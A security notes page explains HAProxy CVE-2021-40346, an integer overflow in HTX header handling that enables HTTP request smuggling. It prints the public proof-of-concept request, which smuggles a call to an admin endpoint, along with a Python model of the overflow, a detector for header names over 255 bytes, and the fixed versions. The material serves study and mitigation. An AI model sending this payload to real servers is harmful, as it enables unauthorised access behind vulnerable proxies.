2022-06-18 13:26:55 +00:00
# HAProxy Common Bugs
## Introduction
What would you do if you came across a website that uses HAProxy? This page collects known HAProxy bugs worth checking for, with the proof-of-concept request that demonstrates each one.
## How to Detect
1. CVE-2021-40346 (HTTP Request Smuggling): an integer overflow in HAProxy's HTX header handling. Each HTX header block stores the header name length in an 8-bit field, and the unpatched `htx_add_header()` added the length in without a range check, so a name of 256 bytes or more wraps and spills into the adjacent value-length field. The JFrog PoC below pads `Content-Length0` with `a`s to 270 bytes (270 mod 256 = 14, the length of `Content-Length`), so the block is read back as a `Content-Length` header with value `0`, a second Content-Length header that the front-end parser never validated against `Content-Length: 60`. The backend then receives the 60-byte body as the start of a new request. Fixed in HAProxy 2.0.25, 2.2.17, 2.3.14 and 2.4.4; on older versions, reject requests carrying any header name longer than 255 bytes.

```
POST /index.html HTTP/1.1
Host: abc.com
Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
Content-Length: 60

GET /admin/add_user.py HTTP/1.1
Host: abc.com
abc: xyz
```
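The arithmetic behind that request, as an added Python model (this is not HAProxy's code and not from the JFrog post). HTX keeps one 32-bit `info` word per block: 4 bits of block type, 20 bits of value length and 8 bits of name length, and the unpatched `htx_add_header()` added the name length into that word unmasked. The script packs and unpacks headers the same way, shows how a constructed 270-byte name reads back as `Content-Length: 0`, applies the length check the fix introduced, and scans a constructed copy of the PoC for header names over 255 bytes, which is the condition a pre-upgrade rule or WAF should reject. The `HTX_BLK_HDR` value, the helper names and the sample request are assumptions made for the model.

```python
"""Model of the HTX header-block packing behind CVE-2021-40346.

Added example, not HAProxy source: reproduces on plain Python ints how an
unmasked 8-bit name length carries into the 20-bit value-length field.
"""

HTX_BLK_HDR = 2            # assumed block-type value; only the 4-bit field width matters
NAME_LEN_MAX = 255         # 8-bit name-length field
VALUE_LEN_MAX = (1 << 20) - 1   # 20-bit value-length field


def pack_info_vulnerable(name: bytes, value: bytes) -> int:
    """info word as the unpatched htx_add_header() computed it: the name
    length is added unmasked, so bit 8 and above spill into the value length."""
    return ((HTX_BLK_HDR << 28) + (len(value) << 8) + len(name)) & 0xFFFFFFFF


def pack_info_fixed(name: bytes, value: bytes):
    """Same packing with the range checks the fix introduced; returns None
    where the patched code refuses to create the block."""
    if len(name) > NAME_LEN_MAX or len(value) > VALUE_LEN_MAX:
        return None
    return pack_info_vulnerable(name, value)


def unpack_header(info: int, raw: bytes):
    """Read the header back the way HTX consumers do: name length from the
    low 8 bits, value length from the next 20, value starting right after the name."""
    name_len = info & 0xFF
    value_len = (info >> 8) & 0xFFFFF
    return raw[:name_len], raw[name_len:name_len + value_len]


def as_haproxy_sees(name: bytes, value: bytes):
    """Header as the vulnerable code stores and later re-reads it."""
    raw = name + value                      # HTX stores name and value back to back
    return unpack_header(pack_info_vulnerable(name, value), raw)


# Constructed request in the shape of the PoC: 'Content-Length0' + 255 'a's = 270 bytes.
SMUGGLE_NAME = b"Content-Length0" + b"a" * 255
POC_REQUEST = (
    b"POST /index.html HTTP/1.1\r\n"
    b"Host: abc.com\r\n"
    + SMUGGLE_NAME + b":\r\n"
    b"Content-Length: 60\r\n"
    b"\r\n"
    b"GET /admin/add_user.py HTTP/1.1\r\n"
    b"Host: abc.com\r\n"
    b"abc: xyz\r\n"
    b"\r\n"
)


def parse_headers(request: bytes):
    """Minimal HTTP/1.1 header split: (name, value) pairs, value whitespace stripped."""
    head, _, _ = request.partition(b"\r\n\r\n")
    headers = []
    for line in head.split(b"\r\n")[1:]:    # skip the request line
        name, _, value = line.partition(b":")
        headers.append((name, value.strip()))
    return headers


def overlong_header_names(request: bytes):
    """Header names that would wrap the 8-bit field: what a mitigation rule should block."""
    return [n for n, _ in parse_headers(request) if len(n) > NAME_LEN_MAX]


if __name__ == "__main__":
    name, value = as_haproxy_sees(SMUGGLE_NAME, b"")
    print("vulnerable HTX re-reads the %d-byte name as %r: %r" % (len(SMUGGLE_NAME), name, value))
    print("patched htx_add_header accepts it:", pack_info_fixed(SMUGGLE_NAME, b"") is not None)
    print("overlong names in PoC:", [n[:20] + b"..." for n in overlong_header_names(POC_REQUEST)])
```

The 270-byte name stores as `(2 << 28) + 270`: the low byte is 14, so the name reads back as `Content-Length`, and the carried bit makes the value length 1, so the value is the byte that followed the name, `0`. The same packing of `Host: abc.com` round-trips unchanged, which is why the bug only shows with names of 256 bytes or more.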
Source:
- [JFrog](https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/)